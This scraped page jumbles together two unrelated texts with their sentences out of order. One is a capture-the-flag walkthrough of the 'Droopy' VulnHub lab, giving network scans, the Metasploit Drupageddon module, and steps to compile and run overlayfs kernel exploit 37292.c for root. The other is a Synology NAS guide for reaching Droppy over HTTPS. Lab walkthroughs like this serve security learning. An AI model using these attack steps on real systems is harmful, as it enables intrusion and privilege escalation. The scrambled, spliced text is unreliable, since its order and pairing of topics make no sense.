![]() Let’s copy it to var/www/html so we can open the file in the browser : cp dave.tc /var/www/html So let’s jump to the folder root by typing cd /root and then type ls to check the file inside the root folder. ![]() This is the exploit for privilege escalation so when this exploit runs, you will have your privilege to the VM.Īfter this check, you id by simply typing id. Once the exploit is compiled give the permissions to shell : chmod 777 shellĪnd then run the. And then type : python -c 'import pty pty.spawn("/bin/bash")'Īnd then type the following command to compile the exploit : gcc 37292.c -o shell Once the exploit is uploaded, go to the shell by simply giving shell command. Go to the /tmp folder by typing cd /tmp and upload the exploit there by typing : upload /root/Desktop/37292.c Luckily we found an exploit “overlayfs local Privilege” at path /usr/share/exploitdb/exploits/Linux/local/37292.c and even you can copy this file on the desktop. ![]() then we look its exploit for privilege escalation with help of the following command. And we all know that there is a very effective exploit for it in Metasploit and to use that type : use exploit/multi/http/drupal_drupageddonīy executing the sysinfo command, we have enumerated the version of kernel ” 3.13.0″ installed in the victim’s machine. So, therefore, lets fire up the IP in the browser.īy studying the webpage we get to know that the website has been made in Drupal CMS. Now that we know our target IP, let’s study it more by using nmap : nmap -p-A 192.168.1.102īy using nmap we find that port no. So by using the above command, we know our target IP is 192.168.1.102. ![]() And to scan the network types the following: netdiscover Let us start by scanning the network so that we can know the IP of our target. Brute Force attack on Truecrypt Volume (Truecrack).Generate a Dictionary with the help of rockyou.txt.Uploading and Downloading dave.tc from /www/html.Privilege Escalation with Kernel Exploit.As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from Penetrating Methodologies: Note: If you don’t add the WebSocket rules at STEP 4 screenshots 2 and 3, when you try to log into Droppy, the page will be blank.Welcome to another boot2root CTF Challenge “Droopy:” uploaded by knightmare on vulnhub. Note: At STEP 4, instead of port 9090 you can use the port of your choice, but remember to port forward it (correctly) in your router following STEP 6. Note: You can use the same operation described above for all docker packages you have previously installed on your Synology NAS to access them via HTTPS/SSL. Note: If you don’t like to see port :9090 at the end of your link take a look at my new article HTTPS-SSL to Your Docker Containers Without Port at The End From now on you can access your Droppy application over HTTPS from anywhere. Open your browser and type in :9090 and you will see the HTTPS / SSL certificate working correctly. Go back to STEP 1 or you will deal with karma □ Follow the instructions in the image below: At the moment I am using a TP-Link router. Remember that every router has its own interface design. Select your NAS Local IP Address and port forward port 9090 both TCP/UDP. Log into your router and go to the Port Forwarding area. Go to Control Panel / Security / Certificate and check if your link yourname.synologyme:9090 is visible. Port: 8989 (Or the port you have previously created on STEP 13 on my Droppy step by step guide).Ģ ( Screenshot 2) On Custom Header TAB click Create then WebSocket.ģ ( Screenshot 3) After you click WebSocket, the rules will be created automatically. After that, add the following instructions: Follow the instructions in the image below.ġ ( Screenshot 1) On General TAB set the Reverse Proxy Description and type in Droppy. Follow the instructions in the image below. Go to Control Panel / Application Portal / Reverse Proxy. Note: If you already own a DDNS, skip this STEP. Please Support My work by Making a Donation.įollow my step by step guide on how to activate your DDNS on DSM 7įollow my step by step guide on how to activate your DDNS on DSM 6.2.4 Note: The guide below is deprecated – Check the new guide here: How to Run Docker Containers Over HTTPS You can access Droppy from outside your home, just like you would any website. Say you’re at a friend’s house and want to use Droppy. ![]() You don’t need to buy domains, you don’t need to look for information elsewhere because here you will find the easy way to do it. Have you already installed Droppy using docker on your Synology NAS following my step by step guide? Do you want to log in via HTTPS using your custom domain name even when you are away from home? It’s simple and free. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |